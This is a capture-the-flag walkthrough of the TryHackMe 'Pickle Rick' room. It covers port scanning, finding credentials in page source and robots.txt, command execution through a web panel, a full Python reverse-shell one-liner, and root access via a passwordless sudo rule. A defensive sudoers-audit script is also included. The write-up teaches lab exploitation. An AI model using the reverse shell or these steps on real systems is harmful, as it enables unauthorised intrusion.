# Pickle Rick

### [Pickle Rick](https://www.tryhackme.com/room/picklerick)

### A Rick and Morty CTF. Help turn Rick back into a human!

### Pickle Rick is a Rick and Morty-themed TryHackMe room where we exploit a web server to find 3 ingredients or flags.

## Questions

1. What is the first ingredient Rick needs?
2. What's the second ingredient Rick needs?
3. What's the final ingredient Rick needs?

## Enumeration

### NMAP

> nmap -sS -sC -sV -A -O -vv BOX_IP

#### output

```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 08:16:72:a6:42:80:aa:21:3f:9e:2a:76:4c:bc:45:0d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDibc1nVIGXaLx8nF5hflDtQi7KVayIQjoV/97QvFHpe67phA9ozRb+o0Azrp3UBxc6zlGDJiPRPdgXZUL53Zygvip9Tj/8GYucBA1yzcN5gtWfR7cVG/vZo/ToDD2bTiVbMy1fW7zWa9Le9VEytFnsBFOk0ePEn5rI7wLuZ+HHaVTJegtq6KIVw9eQUCxTqfjEvFxCyJMSbwPXWdURGwVYOW3VVpU8awDkklUZRQ/ElsKGJLLF+CjtQ3/+aT9VeWKIP8n/k+ymFL0zvkygEGdMaUOFBiaZd8FAAiBAbHXNGg2Scsnmid8V9sXS0tyN4OuItZ7Xc26eKmlsCzDkJlJJ
|   256 38:e1:90:b4:69:a0:49:f8:1d:cb:d5:1a:79:22:a2:b1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGo31VvNkXrpUtTcaSzV68TxybntTXNKXfLV7uueau4r5ROiko7CqYXSBBbcKovi06b+fPCIxdnu84ZHNrMK41Q=
|   256 a0:48:4b:8f:87:64:67:ca:d3:d3:61:3a:b2:80:f3:8e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlvtA3D1u0/IPcguHsofaDoMS4J2/VyFUsc5Ko+hKtM
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
```

We have two open ports: 22 (SSH) and 80 (Apache httpd).

## Site

![](https://user-images.githubusercontent.com/53917092/95249981-e118a900-07ef-11eb-8a7e-cbdd288c1cb3.png)

### Source Code

![](https://user-images.githubusercontent.com/53917092/95249935-d0683300-07ef-11eb-8e78-d666c56d47fc.png)

> Username: R1ckRul3s

### find out interesting directories and files

robots.txt

[![image](https://user-images.githubusercontent.com/53917092/95252646-a4e74780-07f3-11eb-8898-a829866a4218.png)](https://user-images.githubusercontent.com/53917092/95252646-a4e74780-07f3-11eb-8898-a829866a4218.png)

(a string like a password???)

### Login

Trying to log in at /login.php with User: R1ckRul3s and Password: Wubbalubbadubdub

![](https://user-images.githubusercontent.com/53917092/95253093-466e9900-07f4-11eb-89b8-cf9c15df7677.png)

![](https://user-images.githubusercontent.com/53917092/95253107-4cfd1080-07f4-11eb-9bca-459a05af45f4.png)

#### Success

### RCE

On this panel, we were able to execute commands on the system.

[![image](https://user-images.githubusercontent.com/53917092/95253253-85045380-07f4-11eb-9ebd-1a4f1dededdf.png)](https://user-images.githubusercontent.com/53917092/95253253-85045380-07f4-11eb-9ebd-1a4f1dededdf.png)

Then let's try a reverse shell from it.

For this we will use Python, so we need to know where it is (and whether it exists).

![](https://user-images.githubusercontent.com/53917092/95253426-b9780f80-07f4-11eb-9a18-c8905ac8b69d.png)

All right, let's run the reverse shell:

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

(replacing the IP address with my THM VPN IP)

### Reverse Shell

![](https://user-images.githubusercontent.com/53917092/95253810-55098000-07f5-11eb-994a-3c6b88ee9c85.png)

#### Shell to TTY

> python3 -c "import pty; pty.spawn('/bin/bash')"

![](https://user-images.githubusercontent.com/53917092/95254413-3f488a80-07f6-11eb-9a0d-9b3ae8d00ca3.png)

### answering the first question

> cat Sup3rS3cretPickl3Ingred.txt

[![image](https://user-images.githubusercontent.com/53917092/95254695-a7976c00-07f6-11eb-9be7-a3e4041c6b1d.png)](https://user-images.githubusercontent.com/53917092/95254695-a7976c00-07f6-11eb-9be7-a3e4041c6b1d.png)

### walking to the second question

![](https://user-images.githubusercontent.com/53917092/95254893-f8a76000-07f6-11eb-9793-c4acdad204f9.png)

### answering the second question

![](https://user-images.githubusercontent.com/53917092/95255082-402dec00-07f7-11eb-8d45-bb296536341f.png)

### walking to root

Looking at the commands that the user can run:

> sudo -l

![](https://user-images.githubusercontent.com/53917092/95255409-b03c7200-07f7-11eb-90f2-b852d6f149dc.png)

EASY!!!!!

We can run ANY command as root without a password :O
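
The finding above is a passwordless sudo rule covering every command, which makes the shell's user equivalent to root. As an added example (not part of the original write-up), this Python audit parses sudoers text and reports such rules; the sample entries, the `www-data` and `backup` account names, and the function names `passwordless` and `critical` are constructed for illustration, and it assumes one host group per rule.

```python
import re

# Constructed sample sudoers content (assumption: not copied from the room's host).
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, \\
         PASSWD: /bin/tar, ALL
"""

SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>[^=]+?)\s*=\s*(?P<cmds>.+)$")
TAG = re.compile(r"^([A-Z_]+)\s*:\s*")      # NOPASSWD:, PASSWD:, NOEXEC:, ...
RUNAS = re.compile(r"^\(([^)]*)\)\s*")      # (root), (ALL:ALL), ...

def logical_lines(text):
    """Join backslash continuations; drop blank, comment and non-rule lines."""
    for line in re.sub(r"\\\n", " ", text).splitlines():
        line = line.strip()
        first = line.split(None, 1)[0] if line else "#"
        if not (first.startswith(("#", "Defaults")) or first.endswith("_Alias")):
            yield line

def passwordless(text):
    """Return (who, runas, command) for each command sudo allows without a password."""
    findings = []
    for line in logical_lines(text):
        if not (m := SPEC.match(line)):
            continue
        runas, nopasswd = "root", False     # sudo defaults: target root, password required
        # Split the command list on commas that are not inside a (runas) group.
        for spec in re.split(r",(?![^(]*\))", m["cmds"]):
            spec = spec.strip()
            if (r := RUNAS.match(spec)):
                runas, spec = r[1], spec[r.end():]
            while (t := TAG.match(spec)):   # tags persist for later commands in the list
                if t[1] in ("NOPASSWD", "PASSWD"):
                    nopasswd = t[1] == "NOPASSWD"
                spec = spec[t.end():]
            if nopasswd:
                findings.append((m["who"], runas, spec))
    return findings

def critical(findings):
    """NOPASSWD on the ALL command: the account is effectively root."""
    return [f for f in findings if f[2] == "ALL"]

if __name__ == "__main__":
    print(critical(passwordless(SAMPLE_SUDOERS)))
```

The `backup` rule shows why a plain text search for `NOPASSWD` followed by `ALL` misleads: the `PASSWD:` tag resets the requirement before `ALL` is reached, so only the `www-data` rule is reported as critical.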

## Root flag (3rd question)

[![image](https://user-images.githubusercontent.com/53917092/95255573-fdb8df00-07f7-11eb-9447-99a43927e285.png)](https://user-images.githubusercontent.com/53917092/95255573-fdb8df00-07f7-11eb-9447-99a43927e285.png)

